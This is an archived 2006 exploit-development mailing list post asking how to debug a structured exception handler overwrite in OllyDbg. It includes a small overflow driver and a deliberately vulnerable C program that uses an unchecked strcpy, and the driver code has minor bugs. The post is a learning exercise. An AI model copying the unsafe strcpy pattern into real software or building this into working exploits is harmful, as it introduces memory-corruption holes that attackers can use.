Vulnerability Development mailing list archives

debugging seh overwrite

From: laphoo () gmail com
Date: 20 Mar 2006 02:19:57 -0000

Hello, I would like to know a way to debugging a vulnerable program, where I am overwriting the se handler with my 
address. I have OllyDbg as just in time debugger. If my exploit-buffer reaches the pointer to the next seh record, 
nothing happens. Now I was trying to put breakpoint instructions 0xcc) as fake pointer but OllyDbg ignored them, or I 
did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I 
overwrote something?

/* cl expl.c (Visual C++ 6.0) */
#include <stdio.h>
#include <string.h>
int main (void)
{
    char *app[3];
    char payload[84];
    unsigned int ptr = 0xcccccccc;
    memset(payload, 0x00, sizeof payload);
    memset(payload, 0x41, 80);
    memcpy(payload+80, &ret, sizeof (int));
    app[0] = "vuln.exe";
    app[1] = payload;
    app[2] = NULL;
    execve(app[0], app, NULL);
    return 0;
}


/*vuln.c /
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[])
{
    char string[32];
    if (argc > 2)
    {
        printf("Usage: %s <string>\n", argv[0]);
        return 0;
    }
    strcpy(string, argv[1]);
    printf("%s", string);
    return 0;
}

Environment is Windows.XP.SP.2

I am sorry for my bad english.

Regards,
-- Laphoo

Current thread:

debugging seh overwrite laphoo (Mar 20)
- Re: debugging seh overwrite The Jabberwock (Mar 20)
- Re: debugging seh overwrite Felix Lindner (Mar 20)
- Re: debugging seh overwrite Karma (Mar 22)